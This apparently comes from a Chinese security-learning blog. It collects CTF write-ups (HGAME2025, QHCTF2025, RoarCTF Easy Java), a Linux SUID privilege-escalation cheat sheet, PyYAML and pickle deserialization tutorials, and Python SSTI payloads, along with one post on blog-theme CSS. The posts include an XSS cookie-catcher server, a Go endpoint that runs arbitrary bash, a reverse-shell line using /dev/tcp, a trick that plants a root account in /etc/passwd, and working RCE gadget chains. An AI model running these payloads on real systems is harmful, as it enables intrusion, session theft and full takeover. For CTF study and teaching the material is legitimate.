接着就找最优解，然而我算法贼烂，只能找较优解了（

部分脚本：

import re# 找寻需求Hinthints='''Hint 51: 00001100101001111010000000010010001110100000000000000000001101111000100Hint 52: 01101000111011000000000101000100001001101100000000010010001110011000000Hint 53: 10100100000001011000110001001101000010001101011101010110001000000000000Hint 54: 00001010000010010000100110000100000010000100101100111000001011100000111Hint 55: 01110010100100100000000000000000011010110011000001111000101100000001000Hint 56: 01110100001001000010010111101111011101001000100010011001000010011100000Hint 57: 10000101010000000011000001100101001010110100000110110010001000100011000Hint 58: 00000111101000001001000001100100100000110000110000101000001101110100000Hint 59: 01001101001001000000001001001110100000000000001011000100010000101010101Hint 60: 10010010100110011011100010011001100100100001110010010101001000100001111Hint 61: 01001000100011000001000000000011010001110001000000101100001000100010100Hint 62: 00101000010000111000101110000010001000000001000111100010001101001001101Hint 63: 01000010111010000000010100001010001011000100100010000000000000001000000Hint 64: 01110110110011000000010000011000000010000000000000111000000010000010001Hint 65: 01100000000011000110000000010001000000000011001100000110010001011010000Hint 66: 01110011001000101001100001011000011010000001100010100000011010000001000Hint 67: 00111011000011000000100100101000100100101000010001100111001000100001000Hint 68: 01000110010101011100110101110010001111100011010000000101010100000010010Hint 69: 11111010111000110100010000000010001101111010011010001100000011000001001Hint 70: 00000010110101100100100011001011011001100000100010011111000011000001101Hint 71: 00001100001110101000010111001100011100100010011100001010000000001000010Hint 72: 01100000000011001001011100000101000110111000101100010101111000001010100Hint 73: 00001000001010010000001101010110110000110111011011100101011110010110000Hint 74: 01010010100000000111011110001000010110100001000111001101010100000010000Hint 75: 11010000011000010100001010000111011010100001111010100100100000111110110'''hints = re.sub(r'Hint \d\d: ','',hints).replace('\n',',').split(',')need = []noneed = []for i in range(len(hints)):    for j in need:        if hints[i][j] == '0':            break    else:        print(i+51)# 统计Hint中‘1’的数量cnt_1=[]for i in range(len(hints)):    print(f"{i+51}:{hints[i]}")for i in range(len(hints)):    cnt_1.append(f"{i+51}:{hints[i].count('1')}")print(cnt_1)# 追加新hint，合并(某次的情形如下)m = 'aeAkf3o9Cr0QaWyAzi9Cbx82AD42'.replace('1','[').replace('0',']') #防止01混淆，先替换成其他字符enc = '01100000000011001001011100000101000110111000101100010101111000001010100'[::-1]for i in m:    enc = enc.replace('1',i,1)print(enc[::-1])enc = enc[::-1]out = list('}20aHmdLwEL5DACm2Rr8uxbClNhD[96it3qzA2yW0KCSQg]rL7iCA99o3fkMY5guA{emagh')for i in range(len(out)):    if out[i] == '0':        out[i] = enc[0]    enc = enc[1:]for i in out:    print(i,end='')    #得到flagflag='}24aHmdLwEL5DACm2Rr8uxbClNhD196it3qzA2yWaKCSQg0rL7iCA99o3fkMY5guA{emagh'print(flag[::-1])

WP FOR HGAME2025 Week1

2025-02-14T10:03:29.000Z

#Web

#Level 24 Pacman

ctrl+f搜索gift

base64+栅栏密码（2栏）

#Level 47 BandBomb

express题（？，学到很多❀

首先要知道fs.rename不仅仅可以重命名文件，还可以移动文件

那么思路就是把ejs模板文件拿出来，加之文件上传的功能，我们可以在原本的模板中加一句坏东西：

然后通过rename将原本的模板覆盖，就可以执行我们的坏东西了

最后ctrl+F查找flag即可

#Level 69 MysteryMessageBoard

xss获取admin的session，难点在有个未知的/admin的url（

先是登录，有说shallot登录要密码，那么大胆猜测用户名就是shallot。弱密码爆破（还是从shallot学姐去年hgame-week2的一题学的思路）

然后就来到留言板界面，可以打xss了

利用js注入出网脚本,

在服务器上起一个express服务拿session（web2现学现卖了属于是）

 const express = require('express'); const app = express(); const bodyParser = require('body-parser'); const cors = require('cors'); app.use(cors()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true })); app.post('/cookie-catcher', (req, res) => {          console.log(req.body.cookies);          res.send('Cookie received successfully'); }); app.get('/cookie-catcher', (req, res) => {          console.log(req.query.cookies);          res.send('Cookie received successfully'); }); const port = xxxx; app.listen(port, () => {          console.log(`Server running on port ${port}`); });

在注入xss语句后，访问/admin的url就可以触发admin访问我们注入过的页面触发xss，拿到他的 session，再就可以拿到flag

#Level 38475 角落

上来先查robots.txt，查到有个conf文件：

 # Include by httpd.conf  Options Indexes AllowOverride None Require all granted   Order Allow,Deny Deny from all  RewriteEngine On RewriteCond "%{HTTP_USER_AGENT}" "^L1nk/" RewriteRule "^/admin/(.*)$" "/$1.html?secret=todo" ProxyPass "/app/" "http://127.0.0.1:5000/"

RewriteEngine On ：启用Apache的URL重写功能。URL重写允许你根据一定的规则修改客户端请求的 URL。特定条件时才应用重写规则。
RewriteCond “%{HTTP_USER_AGENT}” “^L1nk/“ ：这是一个重写条件，用于指定在满足 %{HTTP_USER_AGENT} 表示客户端的用户代理字符串， ^L1nk/ 是一个正则表达式，用于匹配以客户端的用户代理字符串以 L1nk/ 开头的用户代理字符串。也就是说，只有当 L1nk/ 开头时，才会应用下面的重写规则。
RewriteRule “^/admin/(.*)$” “/$1.html?secret=todo” ：这是一个重写规则，用于将匹配的 URL 重写为新的 URL。 ^/admin/(.*)$ 是一个正则表达式，用于匹配以 /admin/ 开头的 URL，并捕获 URL 是 / 加上捕获的内容再加上 /admin/ 后面的所有内容。 $1 表示捕获的内容，重写后的 .html 后缀，并在 URL 后面添加查询参数 secret=todo 。例如，客户端请求么实际访问的 URL 会被重写为 /admin/test ，如果用户代理字符串以 /test.html?secret=todo 。

通过rewrite截断漏洞来获取源码（CVE-2024-38475)

源码如下。

from flask import Flask, request, render_template, render_template_string, redirect import os #import templates app = Flask(__name__) pwd = os.path.dirname(__file__) show_msg = templates.show_msg # templates.py:    show_msg = '''Latest message: {{message}}''' def readmsg(): filename = pwd + "/tmp/message.txt" if os.path.exists(filename): f = open(filename, 'r') message = f.read() f.close() return message else: return 'No message now.'@app.route('/index', methods=['GET']) def index(): status = request.args.get('status') if status is None: status = '' return render_template("index.html", status=status) @app.route('/send', methods=['POST']) def write_message(): filename = pwd + "/tmp/message.txt" message = request.form['message'] f = open(filename, 'w') f.write(message) f.close() return redirect('index?status=Send successfully!!') @app.route('/read', methods=['GET']) def read_message(): if "{" not in readmsg(): show = show_msg.replace("{{message}}", readmsg()) return render_template_string(show) return 'waf!!' if __name__ == '__main__': app.run(host = '0.0.0.0', port = 5000)

绞尽脑汁总算是从去年的题里发现条件竞争这玩意。因为源码调用readmsg()有两次，第一次是判断，第二次是嵌入，多个线程同时调用 read_msg() 函数，导致数据在不同线程间的读写出现混乱，使得条件判断和替换操作的顺序被打乱，从而绕过了检查。

用burp快速发请求

得到flag

#Level 25 双面人派对

本来给的是加了upx壳的二进制文件，买了个hint跳过了re阶段。用linux中的strings命令来提取去壳后的二进制文件中的字符串，会发现minio的access_key,secret_key,这样就能连上minio，拿到源码了。

看一遍源码，发现有个overseer，是用于热更新服务的，那么只要上传自己构造的恶意二进制文件，我们就能rce。然后，由于本人愚蠢至极，不管三七二十一把源码打包成exe删个后缀就往上扔，卡了好久…

参照柏师傅给出的hint中的rce代码，将之嵌入源码中

g.POST("/shell", func(c *gin.Context) { output, err := exec.Command("/bin/bash", "-c", c.PostForm("cmd")).CombinedOutput() if err != nil { c.String(500, err.Error()) } c.String(200, string(output)) })

打包成elf文件，加上upx压缩，上传到prodbucket存储桶覆盖原来的update，这样就达到了rce的结果了。

#Misc

#Hakuya Want A Girl Friend

给了个txt文件，开头就是50 4B，经典的zip文件头特征，有加密。

之后还跟了一堆乍一看是冗余的数据，其实是png文件hex倒置，转正后提取出来。png宽高修复得到 key。用key来开压缩包，得到flag

#Computer cleaner

在vm上挂载虚拟光盘后，直接先find / - name flag*，发现第三部分flag（这其实也是攻击者想要的东西）

根据提示，是要寻找攻击者的webshell，来到常见的服务路径 /var/www,html/ ,发现shell.php， $_POST的参数就是webshell连接密码。

最后是溯源，发现有log日志文件，访问请求源ip，即可获得第二部分的flag。

(以下upload_log.txt)

Linux提权

2025-02-02T11:27:53.000Z

#利用SUID提权

SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。

如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。

#寻找系统中可利用文件

find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;

这三条 find 命令都是用来查找系统中具有 SUID 权限 的文件

find / -user root -perm -4000 -print 2>/dev/null
查找所有属主为 root 且设置了 SUID 位的文件,直接打印符合条件的文件路径。
- -user root：限定文件属主是 root
- -perm -4000：限定文件权限包含 SUID 位
- 2>/dev/null：忽略错误信息（比如权限不足报错）
find / -perm -u=s -type f 2>/dev/null
查找所有设置了 SUID 位的普通文件,直接打印符合条件的文件路径。
- -perm -u=s：限定文件权限包含 SUID 位
- -type f：只查找普通文件（排除目录等）
find / -user root -perm -4000 -exec ls -ldb {} \;
查找所有属主为 root 且设置了 SUID 位的文件，并显示详细信息。
- -user root：只保留属主为 root 的文件/目录。
- -perm -4000：精确匹配包含SUID位的文件(八进制 4000 表示 SUID 权限)。
- -exec：表示开始定义要执行的命令。
- ls -ldb：查看文件详细信息。
  - -l：长格式显示（权限、属主、时间等）
  - -d：仅显示目录本身（而不是目录内容）
  - -b：转义特殊字符（如空格、换行符）
- {}：占位符，表示当前匹配到的文件路径(之后详解)。
- \;：表示命令结束（在Shell中，分号;表示命令结束。为了将;传递给find而不是被Shell解析,必须用反斜杠转义）。

{} 的作用
类似于编程中的 循环变量，每次 find 找到一个符合条件的文件，就会将文件路径替换到 {} 的位置。
示例：如果找到 /usr/bin/passwd，实际执行的命令是：
ls -ldb /usr/bin/passwd

#设定suid权限

chmod u+s file  #将该文件设置suid权限chmod u-s file  #将该文件去除suid权限

#find

如果find命令是以suid权限运行的话，则将通过find执行的所有命令都会以root权限执行。可以通过find查看find命令本身是否以suid权限运行。

应用格式：

# find 任意存在的文件或目录 -exec 命令 \;find . -exec ls \;# 可以直接用这句

#vim

利用vim在/etc/passwd中写入一个拥有root权限的用户，在转换为该用户。首先应当为这个用户生成一个密码

openssl passwd -1 –salt asd 密码# 如root生成为$1$asd$mwN4uVjCkpk1tFZW.7f54/

在将以下语句写入/etc/passwd

meowko:$1$asd$mwN4uVjCkpk1tFZW.7f54/:0:0:root:/meowko:/bin/bash

有时vim本身没有suid权限，但是其“亚种”有，比如vim.tiny,vim.basic

#Bash

直接开一个bash shell就行。

bash -p

#less&more

less和more是基本一样的，这里用less举例。用less打开一个文件，比如/etc/passwd。

less /etc/passwd

在less界面中，按下!键，这将允许你在less中执行外部命令。然后输入/bin/bash命令并按下回车键。将进入一个新的 shell 会话，由于less具有root权限，这个新的 shell 会话也将以root用户身份运行。

!/bin/bash# 具体要看用的什么shell。

#nano

nano是一个文本编辑器。

/bin/nano # /bin/nano非确定# 按下面的按键执行命令Ctrl + R,Ctrl + X

#cp

cp就是复制指令。

为了复制文件，我们需要一个有写入权限的目录，可使用以下命令创建并切换到该目录。例如：

mkdir /tmp/expcd /tmp/exp

利用cp的suid权限，将/bin/bash复制到刚创建的目录中。

cp /bin/bash .

设置这个bash具有suid权限并运行：

chmod u+s sh./bash

#awk

awk是一种文本处理工具，它是一种编程语言。

awk 'BEGIN {"/bin/bash"}'# 或者awk 'BEGIN {system("/bin/sh")}'

BEGIN 是awk的一个特殊模式，它会在处理输入文件之前执行一次。这里就是打开一个bash。

awk提供了system() 函数，可以用于执行系统命令。

#利用可修改的定时执行sh文件提权。

利用系统中存在的定时执行的sh脚本文件也能提权。如果我们有该文件的修改权，并且该sh文件执行时有root权限，我们就可以写入想执行的命令了。

例子：小蓝鲨的临时存储室

参考~🥰:
Linux提权之八大实战利器与高权限操作技巧
Linux提权————利用SUID提权
借助了一些AI的力量❀
deepseek
豆包

Java做题笔记

2025-01-31T09:10:44.000Z

#Java逆向解密

程序员小张不小心弄丢了加密文件用的秘钥，已知还好小张曾经编写了一个秘钥验证算法，聪明的你能帮小张找到秘钥吗？注意：得到的 flag 请包上 flag{} 提交
附件给了class文件，用jd-gui反编译得到以下源码:

import java.util.ArrayList;import java.util.Scanner;public class Reverse {  public static void main(String[] args) {    Scanner s = new Scanner(System.in);    System.out.println("Please input the flag );    String str = s.next();    System.out.println("Your input is );    System.out.println(str);    char[] stringArr = str.toCharArray();    Encrypt(stringArr);  }    public static void Encrypt(char[] arr) {    ArrayList Resultlist = new ArrayList<>();    for (int i = 0; i < arr.length; i++) {      int result = arr[i] + 64 ^ 0x20;      Resultlist.add(Integer.valueOf(result));    }     int[] KEY = {         180, 136, 137, 147, 191, 137, 147, 191, 148, 136,         133, 191, 134, 140, 129, 135, 191, 65 };    ArrayList KEYList = new ArrayList<>();    for (int j = 0; j < KEY.length; j++)      KEYList.add(Integer.valueOf(KEY[j]));     System.out.println("Result:");    if (Resultlist.equals(KEYList)) {      System.out.println("Congratulations);    } else {      System.err.println("Error);    }   }}

根据加密算法可知，先将明文+64后与0x20(即32)异或获得密文。则编写解密算法即可得到明文:

KEY = [180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65 ]for i in KEY:    print(chr((i^32)-64),end='')# This_is_the_flag_!

#[RoarCTF 2019]Easy Java

进入环境，是一个登录页面

先试试help,发现有报错回显,且url为http://1e576dd1-0f8d-43fb-86bc-dd4ab442fcbf.node5.buuoj.cn:81/Download?filename=help.docx

java.io.FileNotFoundException:{help.docx}

原本怀疑会有ssti(因为存在{}并且有把参数回显),但是查了一圈发现不太对劲。查了一下报错，发现这个java.io.FileNotFoundException是因为文件路径错误、文件不存在、权限问题和磁盘空间不足导致的问题。但是又试了一圈又没啥用，只好查查wp(
结果发现竟然要post请求才能得到文件(~~能想到的都是神人了~~)。然后发现有WEB-INF/web.xml泄露漏洞这么个玩意。

WEB-INF主要包含以下内容：
/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。可以利用这里的信息得到各个class文件的路径，得到网页源码。
/WEB-INF/classes/：包含所有的 Servlet 类和其他类文件，类文件所在的目录结构与他们的包名称匹配。
/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
/WEB-INF/database.properties：数据库配置文件。
众所周知，配置文件大多是很有价值的，我们直接看看这个WEB-INF/web.xml里是什么

            Index                IndexController        com.wm.ctf.IndexController                IndexController        /Index                LoginController        com.wm.ctf.LoginController                LoginController        /Login                DownloadController        com.wm.ctf.DownloadController                DownloadController        /Download                FlagController        com.wm.ctf.FlagController                FlagController        /Flag

从这里我们就能知道FlagController.class这个文件的路径是/WEB-INF/classes/com/wm/ctf/FlagController.class，加之存在的文件读取漏洞，就能够得到这个class文件，反编译后会发现其中存在base64的flag了。

toc文章目录调教记录

2025-01-29T11:37:51.000Z

已经更换主题了~

#没有目录的痛

particlex是个好的hexo主题，但是没有自带的目录（。好吧，试试hexo的插件toc，结果就是目录不跟随还丑，好吧，只能手搓了（

#手搓目录

首先先把toc插件部署好。这类教程倒是很多，比如这个，毕竟也是学的别人，就不多说了。
接着就要把这个目录放到需要的页面了。ParticleX是用ejs来渲染每个页面的，那么我们造个toc.ejs放到layout里。我是这么写的:

<% if (page.toc == true) { %>                                        目录        <%- toc(page.content, {list_number : false}) %>            
<% } %>

上面这段代码不是js,是ejs(下同)。但是写ejs会导致直接渲染成html（

然后定位到post页面中。把<%- partial('toc') %>放到post.ejs。这里我还造了个container_的div块把原本的

和<%- partial('toc') %>包括起来，方便这里用flex布局。

             ...    
    <%- partial('toc') %>

其实开始试过用grid，总之是一堆问题，浪费了不少时间😪

接下来就开始搓css吧~最喜欢搓css哩🤗

/*toc.css*/.toc_title{    color: rgb(121, 121, 121);    font-weight: bolder;    font-size: 30px;    position: relative;    left: 16px;}#ic{    position: relative;    left: 20px;    font-size: 30px;}#toc{    border-radius: 10px;    background-color: rgba(255, 255, 255, 0.871);    box-shadow: 1px 1px 5px rgb(234, 234, 234);    position: sticky;/*使得目录始终在窗口的固定位置*/    top: 100px;    right: 30px;    overflow: auto;    max-height: 600px;    width: 280px;    min-width: none;    flex-shrink: 100;/*适配窗口宽度小时目录消失*/}.toc-link{    font-size: 16px;    display: block;    min-width: 150px;    margin-top: 0px;    transition: 0.6s;}.toc-link:hover{    color: aqua;    transition: 0.6s;}#toc li{    list-style: none;    margin-top: 2px;    position: relative;    right: 10px;}#toc ol{    list-style: none;    margin-top: 2px;    position: relative;    right: 10px;}#container__{    display: flex;    justify-content: center;}

这样终于是搞好了这个目录了，也是又水了一篇博客了🤭

感谢~🥰:
Hexo博客添加文章目录

WP FOR QHCTF2025

2025-01-29T10:44:50.000Z

#Easy_include

利用php://input伪协议可以绕过waf

#Web_IP

通过hint想到确定ip的方法，试试看能不能通过http头伪造，成功，尝试ssti。{{7*7}}成功输出49。尝试{{config}}发现报错，注意到是php写的页面，则可以确认是php的ssti。那么尝试直接rce，成功。

#Web_pop

php反序列化，常规题；注意把private和protected属性改为public。
EXP:

name; //tostring    // }     // public function __isset($var)    // {    //     ($this->func)(); //invoke    // }} class Sec{    public $obj;    public $var;     // public function __toString()    // {    //     $this->obj->check($this->var); //call     //     return "CTFers";    // }     // public function __invoke()    // {    //     echo file_get_contents('/flag');    // }} class Easy{    public $cla;     // public function __call($fun, $var)     // {    //     $this->cla = clone $var[0];    // }} class eeee{    public $obj;     // public function __clone()    // {    //     if(isset($this->obj->cmd)){    //         echo "success";    //     }    // }}$a = new Start();$b = new Sec();$c = new Easy();$d = new eeee();$a -> name = $b;$a -> func = $b;$b -> obj = $c;$b -> var = $d;$c -> cla = $d;$d -> obj = $a;echo serialize($a);

#PCREMagic

phprce(并非)，但是ban了很多很多函数，整了好久。考点是open_basedir的绕过。
本题直接给出了源码，只要上传txt文件(APIfox是真挺好用的)就可以使之解析为php。有个对eval的过滤，感觉意义不明。可以查看phpinfo，发现禁用了一堆函数，没法直接rce了，那就只能找其他法子。
POC:

/is', $data);} if(empty($_FILES)) {    die(show_source(__FILE__));} $user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);$data = file_get_contents($_FILES['file']['tmp_name']);if (is_php($data)) {    echo "bad request";} else {    if (!is_dir($user_dir)) {        mkdir($user_dir, 0755, true);    }    $path = $user_dir . '/' . random_int(0, 10) . '.php';    move_uploaded_file($_FILES['file']['tmp_name'], $path);     header("Location: $path", true, 303);    exit;}?>

利用php中open_basedir的特性，将其设为根目录，用glob()获取目录下文件或目录，再用file_get_contents读取文件内容就行。
EXP:

参考~🥰:
『CTF Tricks』PHP-绕过open_basedir

PY-YAML反序列化

2024-12-25T04:39:18.000Z

#什么是yaml?

YAML是一种人类可读的数据序列化格式，经常用于配置文件和数据交换。它的设计目标是易于阅读和编写，并且能够被不同编程语言支持的解析器解析。
在学习yaml反序列化漏洞之前，肯定要先学学它的基本语法，这里就不过多赘述了，可以看这个教程
这里要重点注意一下类型转换这部分。漏洞利用用的到的一些yaml和python类型转换如下

YAML	Python
!!python/name:module.name	尝试创建module.name这个Python对象
!!python/module:package.module	尝试导入package.module这个模块
!!python/object:module.cls	尝试创建module.cls这个类的实例
!!python/object/new:module.cls [args]	尝试创建module.cls的实例，并传入args的参数
!!python/object/apply:module.func [args]	尝试调用module.func，并传入args的参数

#漏洞成因

#!!python/object/new 和 !!python/object/apply的实现

在constructor.py(也就是默认加载器)中，我们可以找到相应的实现函数

python/object/apply–>construct_python_object_apply
python/object/new–>construct_python_object_new

def construct_python_object_apply(self, suffix, node, newobj=False):        # Format:        #   !!python/object/apply       # (or !!python/object/new)        #   args: [ ... arguments ... ]        #   kwds: { ... keywords ... }        #   state: ... state ...        #   listitems: [ ... listitems ... ]        #   dictitems: { ... dictitems ... }        # or short format:        #   !!python/object/apply [ ... arguments ... ]        # The difference between !!python/object/apply and !!python/object/new        # is how an object is created, check make_python_instance for details.        if isinstance(node, SequenceNode):            # 如果节点为序列类型，则初始化参数、关键字、状态、列表和字典为空            args = self.construct_sequence(node, deep=True)            kwds = {}            state = {}            listitems = []            dictitems = {}        else:             # 如果节点为映射类型，则从值中提取参数、关键字、状态、列表和字典，其实就反应了该类标签所可以接受得参数类型。            value = self.construct_mapping(node, deep=True)            args = value.get('args', [])            kwds = value.get('kwds', {})            state = value.get('state', {})            listitems = value.get('listitems', [])            dictitems = value.get('dictitems', {})        instance = self.make_python_instance(suffix, node, args, kwds, newobj)        #如果存在创建 Python 对象实例        if state:            self.set_python_instance_state(instance, state)        if listitems:            instance.extend(listitems)        if dictitems:            for key in dictitems:                instance[key] = dictitems[key]        return instance    def construct_python_object_new(self, suffix, node):        return self.construct_python_object_apply(suffix, node, newobj=True)        # 可以看到python/object/new和python/object/apply实质上差别并不大

发现make_python_instance这个函数，跟进一下

def make_python_instance(self, suffix, node,            args=None, kwds=None, newobj=False):        if not args:            args = []        if not kwds:            kwds = {}        cls = self.find_python_name(suffix, node.start_mark)        if newobj and isinstance(cls, type):            return cls.__new__(cls, *args, **kwds)        else:            return cls(*args, **kwds)

接着还得看看find_python_name这个函数

def find_python_name(self, name, mark):        if not name:            raise ConstructorError("while constructing a Python object", mark,                    "expected non-empty name appended to the tag", mark)        if '.' in name:            module_name, object_name = name.rsplit('.', 1)        else:            module_name = 'builtins'            object_name = name        try:            __import__(module_name)        except ImportError as exc:            raise ConstructorError("while constructing a Python object", mark,                    "cannot find module %r (%s)" % (module_name, exc), mark)        module = sys.modules[module_name]        if not hasattr(module, object_name):            raise ConstructorError("while constructing a Python object", mark,                    "cannot find %r in the module %r"                    % (object_name, module.__name__), mark)        return getattr(module, object_name)

总结一下，当我们执行yaml.load(‘!!python/object/apply:os.system [“whoami”]’)这串代码时，是这么个流程:

调用construct_python_object_apply函数
随之调用make_python_instance函数
随之调用find_python_name函数
name存在并且有”.”，分开os和system，尝试导入os，将module设定为os，判定os是否存在system属性，存在，返回getattr(module, object_name)
getattr(module, object_name)也就是os.system函数，由于是!!python/object/apply调用所以newobj=Flase，则调用cls(*args, **kwds)，即os.system(“whoami”)

#!!python/module的实现

该标签对应的函数是construct_python_module

def construct_python_module(self, suffix, node):        value = self.construct_scalar(node)        if value:            raise ConstructorError("while constructing a Python module", node.start_mark,                    "expected the empty value, but found %r" % value, node.start_mark)        return self.find_python_module(suffix, node.start_mark)

跟进find_python_module函数

def find_python_module(self, name, mark):        if not name:            raise ConstructorError("while constructing a Python module", mark,                    "expected non-empty name appended to the tag", mark)        try:            __import__(name)        except ImportError as exc:            raise ConstructorError("while constructing a Python module", mark,                    "cannot find module %r (%s)" % (name, exc), mark)        return sys.modules[name]

可以发现这里并没有可以执行指令的地方，只是导入了指定的模块。但也存在利用价值，放到后文讨论

#!!python/name的实现

该标签对应的函数时construct_python_name

def construct_python_name(self, suffix, node):        value = self.construct_scalar(node)        if value:            raise ConstructorError("while constructing a Python name", node.start_mark,                    "expected the empty value, but found %r" % value, node.start_mark)        return self.find_python_name(suffix, node.start_mark)

可见其调用了find_python_name，这个函数之前已经解释过了。最终是返回了module中的name。

#对于PyYAML模块版本<5.1的漏洞利用手法

yaml.load(data,Loader=) #加载单个YAML配置yaml.load_all(data) # 加载多个YAML配置

这些版本的加载器默认为Constructor，并不安全。

#!!python/object/new 和 !!python/object/apply的利用

yaml.load("""!!python/object/apply:os.system- whoami""")# 这样就可以达到调用os.system执行whoami命令。yaml.load("""!!python/object/apply:os.system- bash -c "bash -i >& /dev/tcp/Target_IP/Target_Port 0>&1"""")# 这样就可以达到反弹shell的目的

#!!python/module的利用

如果我们知道某个恶意python文件在服务器上的路径，或者能够上传这样的文件，那么我们就可以利用!!python/module将它以module的形式导入到当前文件
例如:

# exp.pyimport osos.system('whoami')

那么yaml.load(‘!!python/module:upload.exp’)这段语句就可以间接做到rce的作用。

#!!python/name的利用

首先给出一个例子:

import yamlkey= "114514"b= yaml.load('!!python/name:__main__.key' )if b == key:    print("ikun")else:    print("you are not ikun")

我们可以这样来绕过条件判断。当key未知或者不可预测时，也可以这样过条件判断。当然利用方法不止这些，应用总是灵活的。

#对于PyYAML模块版本>=5.1的漏洞利用手法

在PyYaml>=5.1的版本中,find_python_name方法添加了unsafe=False导致我们不能直接通过__import__来引入模块。并且在PyYAML>=5.1版本中,将默认加载器调整为FullConstructor，加载的模块必须位于sys.modules中(说明程序已经 import 过了才让加载)才能够加载成功。
如果没有对于加载器选择的过滤，可以直接变更加载器，然后和之前的操作一样:

yaml.unsafe_load(paylaod)yaml.load(payload,Loader=UnsafeLoader)

当然这基本没有可能性，所以还是另寻出路吧。
Fullconstructor中的find_python_name函数:

def find_python_name(self, name, mark, unsafe=False):        if not name:            raise ConstructorError("while constructing a Python object", mark,                    "expected non-empty name appended to the tag", mark)        if '.' in name:            module_name, object_name = name.rsplit('.', 1)        else:            module_name = 'builtins'            object_name = name        if unsafe:            try:                __import__(module_name)            except ImportError as exc:                raise ConstructorError("while constructing a Python object", mark,                        "cannot find module %r (%s)" % (module_name, exc), mark)        if module_name not in sys.modules:            raise ConstructorError("while constructing a Python object", mark,                    "module %r is not imported" % module_name, mark)        module = sys.modules[module_name]        if not hasattr(module, object_name):            raise ConstructorError("while constructing a Python object", mark,                    "cannot find %r in the module %r"                    % (object_name, module.__name__), mark)        return getattr(module, object_name)

我们可以发现在unsafe为false的时候是无法导入新的模块的，但是我们可以利用builtins进行一些操作
例子:

yaml.load("""!!python/object/new:tuple- !!python/object/new:map  - !!python/name:eval  - ["__import__('os').system('whoami')"] """)

创建一个tuple对象，在这之中创建一个map对象，map的参数就是之后的!!python/name:eval和[“import(‘os’).system(‘whoami’)”]
这里使用tuple也是有其意义的，但是在这里解释有些冗长，详见文末参考~

#更高级的利用方法

在construct_python_object_apply这个函数中，我们可以看到

if listitems:   nstance.extend(listitems)

我们可以新建一个type对象，将它的extend属性令为”!!python/name:exec”,再在加上一个listitems,就可以执行listitems中的命令了

payload = '''!!python/object/new:typeargs:  - exp  - !!python/tuple []  - {"extend": !!python/name:exec }listitems: "__import__('os').system('whoami')"'''yaml.load(payload)

利用state也可以做到一种攻击，首先看看set_python_instance_state函数

def set_python_instance_state(self, instance, state, unsafe=False):        if hasattr(instance, '__setstate__'):            instance.__setstate__(state)        else:            slotstate = {}            if isinstance(state, tuple) and len(state) == 2:                state, slotstate = state            if hasattr(instance, '__dict__'):                if not unsafe and state:                    for key in state.keys():                        self.check_state_key(key)                instance.__dict__.update(state)            elif state:                slotstate.update(state)            for key, value in slotstate.items():                if not unsafe:                    self.check_state_key(key)                setattr(instance, key, value)

下面给出一个用例:

payload = """- !!python/object/new:str    args: []    state: !!python/tuple    - "__import__('os').system('whoami')"    - !!python/object/new:staticmethod      args: [0]      state:        update: !!python/name:exec"""yaml.load(payload)

攻击流程如下:

创建str对象并且不给参数，这主要是个套子的作用，是为了设定其state为!!python/tuple

观察set_python_instance_state函数，

if isinstance(state, tuple) and len(state) == 2:                state, slotstate = state

在现在的情况下，state就是

"__import__('os').system('whoami')"

而slotstate就是

!!python/object/new:staticmethod  args: [0]  state:    update: !!python/name:exec

slotstate经过处理后，其update属性就成为了exec
再执行slotstate.update(state)，其实就是exec(state)

参考~🥰:
PyYaml反序列化漏洞
PyYaml源码

pickle反序列化

2024-12-04T08:13:27.000Z

#什么是pickle?

pickle是python的序列化工具，可以将python对象序列化为字节流，然后再反序列化为python对象。当然，其中的原理还是比较复杂的，具体可以看看这篇文章，写的还是非常详细滴~
这里主要记一下怎么利用这里存在的漏洞喵~

#pickle和reduce方法

python中类的__reduce__方法，在pickle反序列化的时候会被执行。它应当返回字符串或者一个元组，这里主要考虑返回元组的状况。
下例:

class PickleRCE(object):    def __reduce__(self):        import subprocess        return (subprocess.getoutput,(command,)) #也可以是(map,(subprocess.getoutput,command))

这里返回一个二元组，第一个元素是某个对象，而第二个参数也是一个元组，是我们希望传输给首个元素这个对象的参数。像这个例子，相当于是调用了subprocess.getoutput(command),即用子进程执行命令command。
这时我们将其序列化，在存在反序列化漏洞的站点上传这串序列化字符串，就能达到rce的效果。这就是比较经典的pickle反序列化漏洞的利用手法。

Python-ssti

2024-11-27T09:57:03.000Z

#py的内置属性,模块等

__base__:类对象的属性,返回当前类的直接父类字符串。可以用来获取Object类。
__bases__:类对象的属性,返回当前类的直接父类元组。可以用来获取Object类。
__mro__:类对象的属性，返回一个元组，存有类的“方法解析顺序”，可以简单的理解成这个类构造的链（类比js原型链）。可以用来获取Object类。
__subclasses__():类对象的属性,返回当前类的所有直接子类列表。可以用来获取可利用的类。
__class__:各种对象的属性,返回它的所属类。可以用来连接到类对象，方便后续操作。
__init__:类对象都有的函数（初始化函数）。可以用来间接获取__globals__。
__globals__:函数的属性，返回当前函数所处空间下可使用的module、方法以及所有变量。可以用来获取可利用的类(如os)。
__dict__:类对象或类实例的属性,查看对象内部所有属性名和属性值组成的字典。可以用来获取可利用的类。
__builtins__:内建模块，用于定义内建命名空间，使得我们可以使用内建命名空间中定义的函数。可以利用这个模块导入一些模块到内建命名空间中加以利用(如os)
__import__:魔术方法，用于导入模块，常配合__builtins__导入os模块

#常用通用类及语句

利用warnings.catch_warnings配合__builtins__得到eval函数借此进行rce

# 注意__subclasss__的元素索引需要根据实际修改{{[].__class__.__base__.__subclasses__()[138].__init__.__globals__['__builtins__']['__import__']('os').popen('ls /').read()}}

利用os._wrap_close类所属空间下可用的popen函数进行RCE

{{"".__class__.__base__.__subclasses__()[128].__init__.__globals__.popen('whoami').read()}}{{"".__class__.__base__.__subclasses__()[128].__init__.__globals__['popen']('whoami').read()}}

利用subprocess.Popen类进行RCE的payload

{{''.__class__.__base__.__subclasses__()[479]('whoami',shell=True,stdout=-1).communicate()[0].strip()}}

利用__import__导入os模块进行利用

